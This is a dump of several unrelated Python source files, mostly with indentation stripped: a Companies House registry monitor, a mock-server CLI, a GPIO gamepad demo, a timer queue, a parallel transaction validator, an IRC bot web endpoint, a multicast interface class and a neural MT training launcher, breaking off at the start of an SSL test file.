chsmonitor.py
"""
Fetch the Companies House company registry using the streaming API.
"""
import json
import requests
import sling
import sling.flags as flags
import sling.crawl.chs as chs
import sys
import time
import traceback
from threading import Thread
from queue import Queue
flags.define("--chskeys",
help="Companies House API key file",
default="local/keys/chs.txt",
metavar="FILE")
flags.define("--chsdb",
help="database for storing Companies House records",
default="chs",
metavar="DB")
flags.define("--checkpoint",
help="File with latest checkpoint",
default=None,
metavar="FILE")
flags.define("--checkpoint_interval",
help="How often checkpoint is written to disk (seconds)",
default=60,
type=int,
metavar="NUM")
flags.define("--timepoint",
help="Retrieve events starting from a specific timepoint",
default=None,
type=int)
flags.define("--qsize",
help="Event queue size",
default=2000,
type=int,
metavar="NUM")
flags.define("--confirmations",
help="Only update when confirmation date is changed",
default=False,
action="store_true")
flags.parse()
chs.init(flags.arg.chskeys)
chsdb = sling.Database(flags.arg.chsdb, "chsmonitor")
num_changes = 0
checkpoint = None
# Determine timepoint for restart.
timepoint = flags.arg.timepoint
if timepoint is None and flags.arg.checkpoint is not None:
try:
with open(flags.arg.checkpoint, 'r') as ckpt:
timepoint = int(ckpt.read())
  except (OSError, ValueError):
    print("No checkpoint file:", flags.arg.checkpoint)
# Convert date from YYYY-MM-DD to SLING format.
def get_date(s):
if len(s) == 0: return None
year = int(s[0:4])
month = int(s[5:7])
day = int(s[8:10])
return year * 10000 + month * 100 + day
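# Example: get_date("2021-07-09") returns 20210709.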
# Get confirmation date for company.
def get_confirmation(company):
if company is None: return None
if "confirmation_statement" not in company: return None
confstmt = company["confirmation_statement"]
if "last_made_up_to" not in confstmt: return None
return get_date(confstmt["last_made_up_to"])
# Look up company in database.
def lookup_company(company_no):
data = chsdb[company_no]
if data is None: return None
return json.loads(data)
# Event handler.
def process_message(msg):
event = msg["event"]
ts = event["published_at"]
timepoint = int(event["timepoint"])
if msg["resource_kind"] != "company-profile":
print("***", json.dumps(msg, indent=2))
return
# Get company information.
version = stream.timepoint
company = msg["data"]
company_no = company["company_number"]
company_name = company["company_name"]
# Check if confirmation date has changed in confirmation mode.
skip = False
if flags.arg.confirmations:
current = lookup_company(company_no)
latest_confirmation = get_confirmation(company)
current_confirmation = get_confirmation(current)
    if latest_confirmation is not None and current_confirmation is not None:
if current_confirmation >= latest_confirmation:
skip = True
result = "skip"
# Fetch company profile from Companies House.
if not skip:
# Fetch officers and owners.
chs.retrieve_officers(company)
chs.retrieve_owners(company)
# Write company record to database.
result = chsdb.put(company_no, json.dumps(company),
version=version, mode=sling.DBORDERED)
print(timepoint, ts, company_no, company_name, result, chs.quota_left)
sys.stdout.flush()
global checkpoint
checkpoint = timepoint
# Set up event queue.
def worker():
while True:
msg = queue.get()
try:
process_message(msg)
except Exception as e:
print("Error processing message:", msg)
traceback.print_exc(file=sys.stdout)
finally:
queue.task_done()
queue = Queue(flags.arg.qsize)
t = Thread(target=worker)
t.daemon = True
t.start()
# Checkpoint thread.
def checkpointer():
global checkpoint
while True:
    if checkpoint is not None:
print("CHECKPOINT", checkpoint, "QUEUE:", queue.qsize())
with open(flags.arg.checkpoint, 'w') as ckpt:
ckpt.write(str(checkpoint))
checkpoint = None
sys.stdout.flush()
time.sleep(flags.arg.checkpoint_interval)
if flags.arg.checkpoint is not None:
t = Thread(target=checkpointer)
t.daemon = True
t.start()
# Receive events from Companies House streaming service.
stream = chs.CHSStream(timepoint)
while True:
try:
for msg in stream:
queue.put(msg)
except requests.exceptions.ChunkedEncodingError:
print("Stream closed")
sys.stdout.flush()
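    # Back off before reconnecting; in non-confirmation mode, wait longer while
    # the event queue is still long so the worker can drain the backlog first.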
if flags.arg.confirmations:
time.sleep(60)
else:
time.sleep(60 + queue.qsize())
except Exception as e:
print("Event error", type(e), ":", e)
traceback.print_exc(file=sys.stdout)
sys.stdout.flush()
time.sleep(60)
manager.py
import argparse
import webbrowser
import json
import traceback
import socket
import threading
import signal
import os
from pathlib import Path
from lyrebird import log
from lyrebird import application
from lyrebird.config import Rescource, ConfigManager
from lyrebird.mock.mock_server import LyrebirdMockServer
from lyrebird.proxy.proxy_server import LyrebirdProxyServer
from lyrebird.event import EventServer
from lyrebird.task import BackgroundTaskServer
logger = log.get_logger()
def main():
"""
Command line main entry
Start lyrebird
* start in default config
```
lyrebird
```
* start with verbose mode
```
lyrebird -v
```
* start without open a web browser
```
lyrebird -b
```
* start with a specified config file
```
lyrebird -c /path/to/your/config/file
```
* start with multipart args
```
lyrebird -v --mock 8080 -c /path/to/your/config/file
```
"""
parser = argparse.ArgumentParser(prog='lyrebird')
parser.add_argument('-v', dest='verbose', action='store_true', help='Show verbose log')
parser.add_argument('--mock', dest='mock', type=int, help='Set mock server port, default port is 4272')
parser.add_argument('--proxy', dest='proxy', type=int, help='Set proxy server port, default port is 9090')
parser.add_argument('--data', dest='data', help='Set data dir, default is "./data/"')
parser.add_argument('-b', '--no_browser', dest='no_browser', action='store_true', help='Start without open a browser')
parser.add_argument('-c', '--config', dest='config', help='Start with a config file. Default is "~/.lyrebird/conf.json"')
parser.add_argument('--log', dest='log', help='Set output log file path')
subparser = parser.add_subparsers(dest='sub_command')
src_parser = subparser.add_parser('src')
src_parser.add_argument('uri')
subparser.add_parser('plugin')
args = parser.parse_args()
if args.config:
application._cm = ConfigManager(conf_path=args.config)
else:
application._cm = ConfigManager()
application._src = Rescource()
# set current ip to config
try:
application._cm.config['ip'] = _get_ip()
except socket.gaierror as e:
logger.error('Failed to get local IP address, error occurs on %s' % e)
if args.verbose:
application._cm.config['verbose'] = True
# init file logger after config init
log.init(args.log)
if args.mock:
application._cm.config['mock.port'] = args.mock
if args.proxy:
application._cm.config['proxy.port'] = args.proxy
if args.data:
application._cm.config['mock.data'] = args.data
logger.debug(f'Read args: {args}')
if args.sub_command == 'src':
logger.debug('EXEC SUBCMD:SRC')
src(args)
elif args.sub_command == 'plugin':
logger.debug('EXEC SUBCMD:PLUGIN')
plugin(args)
else:
logger.debug('EXEC LYREBIRD START')
run(args)
def run(args:argparse.Namespace):
# Check mock data group version. Update if is older than 1.x
from . import mock_data_formater
data_path = application._cm.config['mock.data']
data_dir = Path(data_path)
mock_data_formater.check_data_dir(data_dir)
# show current config contents
config_str = json.dumps(application._cm.config, ensure_ascii=False, indent=4)
logger.warning(f'Lyrebird start with config:\n{config_str}')
application.server['event'] = EventServer()
application.server['task'] = BackgroundTaskServer()
application.server['proxy'] = LyrebirdProxyServer()
application.server['mock'] = LyrebirdMockServer()
application.start_server()
# auto open web browser
if not args.no_browser:
webbrowser.open(f'http://localhost:{application.config["mock.port"]}')
# stop event handler
def signal_handler(signum, frame):
application.stop_server()
threading.Event().set()
logger.warning('!!!Ctrl-C pressed. Lyrebird stop!!!')
os._exit(1)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
def debug():
# use lyrebird.debug to start plugin in debug mode
    # args can be passed in via sys.argv
main()
# main thread loop
import asyncio
loop = asyncio.get_event_loop()
loop.run_forever()
def plugin(args:argparse.Namespace):
pass
def src(args:argparse.Namespace):
from threading import Thread
def worker():
application._src.download(args.uri)
Thread(target=worker).start()
def _get_ip():
"""
Get local ip from socket connection
:return: IP Addr string
"""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(('meituan.com', 80))
        return s.getsockname()[0]
    finally:
        s.close()
gamepad_ns_gpio.py
"""
Demonstrate use of the NSGamepad class with GPIO pins. nsgamepad_usb must
be run first to create the USB gadget.
$ sudo apt update
$ sudo apt install gpiozero
Must be run as root like this:
$ sudo ./ns_gamepad_usb
$ cd Code
$ sudo python3 gamepad_ns_gpio.py
"""
import array
import time
import threading
import signal
from gpiozero import Button
from NSGamepad import *
Gamepad = NSGamepad()
# Map the 4 direction buttons (up, right, down, left) to NS direction pad values
BUTTONS_MAP_DPAD = array.array('B', [
# U = Up button, R = right button, etc
# LDRU
DPad.CENTERED, # 0000
DPad.UP, # 0001
DPad.RIGHT, # 0010
DPad.UP_RIGHT, # 0011
DPad.DOWN, # 0100
DPad.CENTERED, # 0101
DPad.DOWN_RIGHT, # 0110
DPad.CENTERED, # 0111
DPad.LEFT, # 1000
DPad.UP_LEFT, # 1001
DPad.CENTERED, # 1010
DPad.CENTERED, # 1011
DPad.DOWN_LEFT, # 1100
DPad.CENTERED, # 1101
DPad.CENTERED, # 1110
DPad.CENTERED # 1111
])
class DpadBits(object):
""" Convert 4 direction buttons to direction pad values """
def __init__(self):
self.dpad_bits = 0
def set_bit(self, bit_num):
""" Set bit in direction pad bit map. Update NSGadget direction pad. """
self.dpad_bits |= (1 << bit_num)
return BUTTONS_MAP_DPAD[self.dpad_bits]
def clear_bit(self, bit_num):
""" Clear bit in direction pad bit map. Update NSGadget direction pad. """
self.dpad_bits &= ~(1 << bit_num)
return BUTTONS_MAP_DPAD[self.dpad_bits]
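# Example: pressing the up button sets bit 0 and pressing the right button sets
# bit 1, so dpad_bits becomes 0b0011, which BUTTONS_MAP_DPAD maps to DPad.UP_RIGHT.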
def gpio_handler():
""" Thread to handle buttons connected to GPIO pins. """
all_buttons = {}
dpad_bits = DpadBits()
def gpio_pressed(button):
""" Called when button connected to GPIO pin is pressed/closed """
print('pressed', button.pin)
if button.pin in all_buttons:
ns_button = all_buttons[button.pin]
if ns_button < 128:
Gamepad.press(ns_button)
else:
Gamepad.dPad(dpad_bits.set_bit(255 - ns_button))
else:
            print('Invalid button')
def gpio_released(button):
""" Called when button connected to GPIO pin is released/opened """
print('released', button.pin)
if button.pin in all_buttons:
ns_button = all_buttons[button.pin]
if ns_button < 128:
Gamepad.release(ns_button)
else:
Gamepad.dPad(dpad_bits.clear_bit(255 - ns_button))
else:
            print('Invalid button')
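    # Map GPIO pin numbers to NS button codes. Values 252-255 are not real
    # NSButton codes; they encode direction pad bits (255=up, 254=right,
    # 253=down, 252=left) and are decoded above via set_bit/clear_bit(255 - ns_button).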
gpio_ns_map = (
# Left side (blue joy-con) buttons
{'gpio_number': 4, 'ns_button': NSButton.LEFT_THROTTLE},
{'gpio_number': 17, 'ns_button': NSButton.LEFT_TRIGGER},
{'gpio_number': 27, 'ns_button': NSButton.MINUS},
{'gpio_number': 22, 'ns_button': NSButton.CAPTURE},
{'gpio_number': 5, 'ns_button': 255},
{'gpio_number': 6, 'ns_button': 254},
{'gpio_number': 13, 'ns_button': 253},
{'gpio_number': 19, 'ns_button': 252},
{'gpio_number': 26, 'ns_button': NSButton.LEFT_STICK},
# Right side (red joy-con) buttons
{'gpio_number': 23, 'ns_button': NSButton.RIGHT_THROTTLE},
{'gpio_number': 24, 'ns_button': NSButton.RIGHT_TRIGGER},
{'gpio_number': 25, 'ns_button': NSButton.PLUS},
{'gpio_number': 8, 'ns_button': NSButton.HOME},
{'gpio_number': 7, 'ns_button': NSButton.A},
{'gpio_number': 12, 'ns_button': NSButton.B},
{'gpio_number': 16, 'ns_button': NSButton.X},
{'gpio_number': 20, 'ns_button': NSButton.Y},
{'gpio_number': 21, 'ns_button': NSButton.RIGHT_STICK}
)
# For each GPIO to NS button entry, allocate gpiozero Button object
# and update all_buttons dictionary. The when_pressed and when_released
# callback functions use all_buttons to find the corresponding
# NS button value.
for element in gpio_ns_map:
element['button'] = Button(element['gpio_number'])
all_buttons[element['button'].pin] = element['ns_button']
element['button'].when_pressed = gpio_pressed
element['button'].when_released = gpio_released
signal.pause()
def main():
""" main program """
threading.Thread(target=gpio_handler, args=(), daemon=True).start()
Gamepad.begin('/dev/hidg0')
    while True:
        # Read from keyboard and mouse input using evdev?
        time.sleep(1)
if __name__ == "__main__":
main()
timer_queue.py
# Copyright 2016 Splunk, Inc.
# SPDX-FileCopyrightText: 2020 2020
#
# SPDX-License-Identifier: Apache-2.0
"""
A simple thread-safe timer queue implementation which has O(log n) time complexity.
"""
try:
import queue as Queue
except ImportError:
import Queue
import logging
import threading
import traceback
from time import time
import sortedcontainers as sc
__all__ = ["Timer", "TimerQueueStruct", "TimerQueue"]
class Timer(object):
"""Timer wraps the callback and timestamp related attributes.
:param callback: Arbitrary callable object.
:type callback: ``callable object``
:param when: The first expiration time, seconds since epoch.
:type when: ``integer``
:param interval: Timer interval, if equals 0, one time timer, otherwise
the timer will be periodically executed
:type interval: ``integer``
:param ident: (optional) Timer identity.
:type ident: ``integer``
"""
_ident = 0
_lock = threading.Lock()
def __init__(self, callback, when, interval, ident=None):
self._callback = callback
self.when = when
self.interval = interval
if ident is not None:
self.ident = ident
else:
with Timer._lock:
self.ident = Timer._ident + 1
Timer._ident = Timer._ident + 1
def update_expiration(self):
self.when += self.interval
def __hash__(self):
return hash(self.ident)
def __eq__(self, other):
return isinstance(other, Timer) and (self.ident == other.ident)
def __lt__(self, other):
return (self.when, self.ident) < (other.when, other.ident)
def __le__(self, other):
return (self.when, self.ident) <= (other.when, other.ident)
def __gt__(self, other):
return (self.when, self.ident) > (other.when, other.ident)
def __ge__(self, other):
return (self.when, self.ident) >= (other.when, other.ident)
def __call__(self):
self._callback()
TEARDOWN_SENTINEL = None
class TimerQueueStruct(object):
"""
The underlying data structure for TimerQueue
"""
def __init__(self):
self._timers = sc.SortedSet()
self._cancelling_timers = {}
def add_timer(self, callback, when, interval, ident):
"""Add timer to the data structure.
:param callback: Arbitrary callable object.
:type callback: ``callable object``
:param when: The first expiration time, seconds since epoch.
:type when: ``integer``
:param interval: Timer interval, if equals 0, one time timer, otherwise
the timer will be periodically executed
:type interval: ``integer``
:param ident: (optional) Timer identity.
:type ident: ``integer``
:returns: A timer object which should not be manipulated directly by
clients. Used to delete/update the timer
:rtype: ``solnlib.timer_queue.Timer``
"""
timer = Timer(callback, when, interval, ident)
self._timers.add(timer)
return timer
def remove_timer(self, timer):
"""Remove timer from data structure.
:param timer: Timer object which is returned by ``TimerQueueStruct.add_timer``.
:type timer: ``Timer``
"""
try:
self._timers.remove(timer)
except ValueError:
logging.info(
"Timer=%s is not in queue, move it to cancelling " "list", timer.ident
)
else:
self._cancelling_timers[timer.ident] = timer
def get_expired_timers(self):
"""Get a list of expired timers.
:returns: a list of ``Timer``, empty list if there is no expired
timers.
:rtype: ``list``
"""
next_expired_time = 0
now = time()
expired_timers = []
for timer in self._timers:
if timer.when <= now:
expired_timers.append(timer)
if expired_timers:
del self._timers[: len(expired_timers)]
if self._timers:
next_expired_time = self._timers[0].when
return (next_expired_time, expired_timers)
def reset_timers(self, expired_timers):
"""Re-add the expired periodical timers to data structure for next
round scheduling.
:returns: True if there are timers added, False otherwise.
:rtype: ``bool``
"""
has_new_timer = False
cancelling_timers = self._cancelling_timers
for timer in expired_timers:
if timer.ident in cancelling_timers:
                logging.info("Timer=%s has been cancelled", timer.ident)
continue
elif timer.interval:
# Repeated timer
timer.update_expiration()
self._timers.add(timer)
has_new_timer = True
cancelling_timers.clear()
return has_new_timer
def check_and_execute(self):
"""Get expired timers and execute callbacks for the timers.
:returns: duration of next expired timer.
:rtype: ``float``
"""
(next_expired_time, expired_timers) = self.get_expired_timers()
for timer in expired_timers:
try:
timer()
except Exception:
logging.error(traceback.format_exc())
self.reset_timers(expired_timers)
return _calc_sleep_time(next_expired_time)
class TimerQueue(object):
"""A simple timer queue implementation.
    It runs a separate thread to handle timers. Note: to use this timer queue
    effectively, the timer callback should be short; otherwise it will delay
    the execution of other timers. A typical production scenario is that the
    timers are just simple functions which enqueue themselves into a task
    queue and are then picked up by a threading/process pool for execution,
    as shown below:
Timers --enqueue---> TimerQueue --------expiration-----------
|
|
\|/
Threading/Process Pool <---- TaskQueue <--enqueue-- Timers' callback (nonblocking)
Usage::
    >>> from solnlib import timer_queue
    >>> tq = timer_queue.TimerQueue()
>>> tq.start()
>>> t = tq.add_timer(my_func, time.time(), 10)
>>> # do other stuff
>>> tq.stop()
"""
def __init__(self):
self._timers = TimerQueueStruct()
self._lock = threading.Lock()
self._wakeup_queue = Queue.Queue()
self._thr = threading.Thread(target=self._check_and_execute)
self._thr.daemon = True
self._started = False
def start(self):
"""Start the timer queue."""
if self._started:
return
self._started = True
self._thr.start()
logging.info("TimerQueue started.")
def stop(self):
"""Stop the timer queue."""
if not self._started:
return
        self._started = False
self._wakeup(TEARDOWN_SENTINEL)
self._thr.join()
def add_timer(self, callback, when, interval, ident=None):
"""Add timer to the queue.
:param callback: Arbitrary callable object.
:type callback: ``callable object``
:param when: The first expiration time, seconds since epoch.
:type when: ``integer``
:param interval: Timer interval, if equals 0, one time timer, otherwise
the timer will be periodically executed
:type interval: ``integer``
:param ident: (optional) Timer identity.
:type ident: ``integer``
:returns: A timer object which should not be manipulated directly by
clients. Used to delete/update the timer
"""
with self._lock:
timer = self._timers.add_timer(callback, when, interval, ident)
self._wakeup()
return timer
def remove_timer(self, timer):
"""Remove timer from the queue.
:param timer: Timer object which is returned by ``TimerQueue.add_timer``.
:type timer: ``Timer``
"""
with self._lock:
self._timers.remove_timer(timer)
def _check_and_execute(self):
wakeup_queue = self._wakeup_queue
        while True:
(next_expired_time, expired_timers) = self._get_expired_timers()
for timer in expired_timers:
try:
# Note, please make timer callback effective/short
timer()
except Exception:
logging.error(traceback.format_exc())
self._reset_timers(expired_timers)
sleep_time = _calc_sleep_time(next_expired_time)
try:
wakeup = wakeup_queue.get(timeout=sleep_time)
if wakeup is TEARDOWN_SENTINEL:
break
except Queue.Empty:
pass
logging.info("TimerQueue stopped.")
def _get_expired_timers(self):
with self._lock:
return self._timers.get_expired_timers()
def _reset_timers(self, expired_timers):
with self._lock:
has_new_timer = self._timers.reset_timers(expired_timers)
if has_new_timer:
self._wakeup()
def _wakeup(self, something="not_None"):
self._wakeup_queue.put(something)
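# Compute how long the scheduler thread may sleep: the time remaining until the
# next expiration, 0.1s if a timer is already due, or 1s when no timer is pending.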
def _calc_sleep_time(next_expired_time):
if next_expired_time:
now = time()
if now < next_expired_time:
sleep_time = next_expired_time - now
else:
sleep_time = 0.1
else:
sleep_time = 1
return sleep_time
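# Minimal usage sketch (illustrative only, not part of the library): schedule a
# one-second periodic timer, let it fire a few times, then stop the queue.
if __name__ == "__main__":
    import time as _time

    def _tick():
        print("tick")

    tq = TimerQueue()
    tq.start()
    tq.add_timer(_tick, time() + 1, 1)
    _time.sleep(3.5)
    tq.stop()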
parallel_validation.py
# Copyright © 2020 Interplanetary Database Association e.V.,
# BigchainDB and IPDB software contributors.
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
import multiprocessing as mp
from collections import defaultdict
from multichaindb import App, MultiChainDB
from multichaindb.tendermint_utils import decode_transaction
from abci import CodeTypeOk
class ParallelValidationApp(App):
def __init__(self, multichaindb=None, events_queue=None, abci=None):
super().__init__(multichaindb, events_queue, abci=abci)
self.parallel_validator = ParallelValidator()
self.parallel_validator.start()
def check_tx(self, raw_transaction):
return self.abci.ResponseCheckTx(code=CodeTypeOk)
def deliver_tx(self, raw_transaction):
self.parallel_validator.validate(raw_transaction)
return self.abci.ResponseDeliverTx(code=CodeTypeOk)
def end_block(self, request_end_block):
result = self.parallel_validator.result(timeout=30)
for transaction in result:
if transaction:
self.block_txn_ids.append(transaction.id)
self.block_transactions.append(transaction)
return super().end_block(request_end_block)
RESET = 'reset'
EXIT = 'exit'
class ParallelValidator:
def __init__(self, number_of_workers=mp.cpu_count()):
self.number_of_workers = number_of_workers
self.transaction_index = 0
self.routing_queues = [mp.Queue() for _ in range(self.number_of_workers)]
self.workers = []
self.results_queue = mp.Queue()
def start(self):
for routing_queue in self.routing_queues:
worker = ValidationWorker(routing_queue, self.results_queue)
process = mp.Process(target=worker.run)
process.start()
self.workers.append(process)
def stop(self):
for routing_queue in self.routing_queues:
routing_queue.put(EXIT)
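    # Transactions are routed to a worker chosen from the transaction id, so the
    # same id always lands on the same worker; the running transaction_index is
    # sent along so results can be reassembled in submission order by result().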
def validate(self, raw_transaction):
dict_transaction = decode_transaction(raw_transaction)
index = int(dict_transaction['id'], 16) % self.number_of_workers
self.routing_queues[index].put((self.transaction_index, dict_transaction))
self.transaction_index += 1
def result(self, timeout=None):
result_buffer = [None] * self.transaction_index
for _ in range(self.transaction_index):
index, transaction = self.results_queue.get(timeout=timeout)
result_buffer[index] = transaction
self.transaction_index = 0
for routing_queue in self.routing_queues:
routing_queue.put(RESET)
return result_buffer
class ValidationWorker:
"""Run validation logic in a loop. This Worker is suitable for a Process
life: no thrills, just a queue to get some values, and a queue to return results.
Note that a worker is expected to validate multiple transactions in
multiple rounds, and it needs to keep in memory all transactions already
validated, until a new round starts. To trigger a new round of validation,
a ValidationWorker expects a `RESET` message. To exit the infinite loop the
worker is in, it expects an `EXIT` message.
"""
def __init__(self, in_queue, results_queue):
self.in_queue = in_queue
self.results_queue = results_queue
self.multichaindb = MultiChainDB()
self.reset()
def reset(self):
# We need a place to store already validated transactions,
        # in case of dependent transactions in the same block.
# `validated_transactions` maps an `asset_id` with the list
# of all other transactions sharing the same asset.
self.validated_transactions = defaultdict(list)
def validate(self, dict_transaction):
try:
asset_id = dict_transaction['asset']['id']
except KeyError:
asset_id = dict_transaction['id']
transaction = self.multichaindb.is_valid_transaction(
dict_transaction,
self.validated_transactions[asset_id])
if transaction:
self.validated_transactions[asset_id].append(transaction)
return transaction
def run(self):
while True:
message = self.in_queue.get()
if message == RESET:
self.reset()
elif message == EXIT:
return
else:
index, transaction = message
self.results_queue.put((index, self.validate(transaction)))
androidServiceModule.py
from ircBase import *
from bottle import route, run, template
import apTrackingModule
import time
import datetime
import ConfigParser
from multiprocessing import Process
import MySQLdb as mdb  # assumed alias for the MySQL driver used by mdb.connect() below; may already be provided by ircBase
config = ConfigParser.SafeConfigParser()
config.read('configs/ircBase.conf')
CONST_DB_USER = config.get('MySql', 'username')
CONST_DB_PASSWORD = config.get('MySql', 'password')
def setup_server(theHost, thePort, theModule):
route('/<action>/<name>')(theModule.index)
run(host=theHost, port=thePort)
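# bottle's run() blocks the calling thread, so setup_server is launched in a
# separate Process from defineResponses to keep the IRC module responsive.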
class AndroidServiceModule(IrcModule):
def defineResponses(self):
t = Process(target=setup_server, kwargs=dict(theHost='0.0.0.0', thePort=31337, theModule=self))
t.start()
def index(self, action, name):
#Open Database Connection
databaseConnection = mdb.connect('localhost', CONST_DB_USER, CONST_DB_PASSWORD)
#Perform ap tracking action for stats
returnMessage = ''
if(action=='stats'):
statsMessage = apTrackingModule.getApStatsForNick(databaseConnection, name)
returnMessage = '{'
if 'drinking' in statsMessage:
returnMessage += '"currentAP":"true",'
returnMessage += '"message":"' + statsMessage + '"}'
#Perform ap tracking action for start
if(action=='start'):
startMessage = apTrackingModule.startTrackingApForNick(databaseConnection, name)
if 'Bottoms' in startMessage:
self.ircBot.irc.sendMessage(IrcMessage.newRoomMessage(name + ' has started drinking an AP. ' + startMessage))
returnMessage = '{"message":"' + startMessage + '"}'
#Perform ap tracking action for stop
if(action=='stop'):
stopMessage = apTrackingModule.stopTrackingApForNick(databaseConnection, name)
if 'took' in stopMessage:
self.ircBot.irc.sendMessage(IrcMessage.newRoomMessage(stopMessage.replace('you',name)))
returnMessage = '{"message":"' + stopMessage + '"}'
#Close Database Connection
databaseConnection.close()
return returnMessage
Interface.py
import socket
import struct
import threading
import netifaces
import ipaddress
import traceback
from fcntl import ioctl
from abc import ABCMeta, abstractmethod
SIOCGIFMTU = 0x8921
class Interface(metaclass=ABCMeta):
def __init__(self, interface_name, recv_socket, send_socket, vif_index):
self.interface_name = interface_name
# virtual interface index for the multicast routing table
self.vif_index = vif_index
# set receive socket and send socket
self._send_socket = send_socket
self._recv_socket = recv_socket
self.interface_enabled = False
def enable(self):
"""
Enable this interface
This will start a thread to be executed in the background to be used in the reception of control packets
"""
self.interface_enabled = True
# run receive method in background
receive_thread = threading.Thread(target=self.receive)
receive_thread.daemon = True
receive_thread.start()
def receive(self):
"""
Method that will be executed in the background for the reception of control packets
"""
while self.interface_enabled:
try:
(raw_bytes, src_addr) = self._recv_socket.recvfrom(256 * 1024)
if raw_bytes:
self._receive(raw_bytes, src_addr)
except Exception:
traceback.print_exc()
continue
@abstractmethod
def _receive(self, raw_bytes, src_addr):
"""
Subclass method to be implemented
This method will be invoked whenever a new control packet is received
"""
raise NotImplementedError
def send(self, data: bytes, group_ip: str):
"""
Send a control packet through this interface
Explicitly destined to group_ip (can be unicast or multicast IP)
"""
if self.interface_enabled and data:
try:
self._send_socket.sendto(data, (group_ip, 0))
except socket.error:
pass
def remove(self):
"""
This interface is no longer active....
Clear all state regarding it
"""
self.interface_enabled = False
try:
self._recv_socket.shutdown(socket.SHUT_RDWR)
except Exception:
pass
self._recv_socket.close()
self._send_socket.close()
def is_enabled(self):
"""
Verify if this interface is enabled
"""
return self.interface_enabled
@abstractmethod
def get_ip(self):
"""
Get IP of this interface
"""
raise NotImplementedError
def get_all_interface_networks(self):
"""
Get all subnets associated with this interface.
Used to verify if interface is directly connected to a multicast source
This is extremely relevant on IPv6, where an interface can be connected to multiple subnets (global, link-local,
unique-local)
"""
all_networks = set()
for if_addr in netifaces.ifaddresses(self.interface_name)[self._get_address_family()]:
ip_addr = if_addr["addr"].split("%")[0]
netmask = if_addr["netmask"].split("/")[0]
prefix_length = str(bin(int(ipaddress.ip_address(netmask).packed.hex(), 16)).count('1'))
network = ip_addr + "/" + prefix_length
all_networks.add(str(ipaddress.ip_interface(network).network))
return all_networks
@staticmethod
@abstractmethod
def _get_address_family():
raise NotImplementedError
def get_mtu(self):
"""
Get MTU of this interface
"""
'''Use socket ioctl call to get MTU size'''
s = socket.socket(type=socket.SOCK_DGRAM)
ifr = self.interface_name + '\x00'*(32-len(self.interface_name))
try:
ifs = ioctl(s, SIOCGIFMTU, ifr)
mtu = struct.unpack('<H', ifs[16:18])[0]
except:
traceback.print_exc()
raise
#log.debug('get_mtu: mtu of {0} = {1}'.format(self.ifname, mtu))
return mtu
train.py
#!/usr/bin/env python
"""
Main training workflow
"""
import configargparse
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.logging import logger
from onmt.train_single import main as single_main
def parse_args():
parser = configargparse.ArgumentParser(
description='train.py',
config_file_parser_class=configargparse.YAMLConfigFileParser,
formatter_class=configargparse.ArgumentDefaultsHelpFormatter)
opts.general_opts(parser)
opts.config_opts(parser)
opts.add_md_help_argument(parser)
opts.model_opts(parser)
opts.train_opts(parser)
opt = parser.parse_args()
return opt
def run(opt, device_id, error_queue):
""" run process """
try:
gpu_rank = onmt.utils.distributed.multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
single_main(opt, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def main():
opt = parse_args()
print(
"[train.py] opt.model_mode: {}, opt.model_mode2: {}, opt.model_ffn_mode: {}"
.format(opt.model_mode, opt.model_mode2, opt.model_ffn_mode)
)
if opt.rnn_type == "SRU" and not opt.gpu_ranks:
raise AssertionError("Using SRU requires -gpu_ranks set.")
if opt.epochs:
raise AssertionError("-epochs is deprecated please use -train_steps.")
if opt.truncated_decoder > 0 and opt.accum_count > 1:
raise AssertionError("BPTT is not compatible with -accum > 1")
if opt.gpuid:
raise AssertionError("gpuid is deprecated \
see world_size and gpu_ranks")
nb_gpu = len(opt.gpu_ranks)
if opt.world_size > 1:
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for device_id in range(nb_gpu):
procs.append(mp.Process(target=run, args=(
opt, device_id, error_queue, ), daemon=True))
procs[device_id].start()
logger.info(" Starting process pid: %d " % procs[device_id].pid)
error_handler.add_child(procs[device_id].pid)
for p in procs:
p.join()
elif nb_gpu == 1: # case 1 GPU only
single_main(opt, 0)
else: # case only CPU
single_main(opt, -1)
if __name__ == "__main__":
main()
test_ssl.py
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = import_helper.import_module("ssl")
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
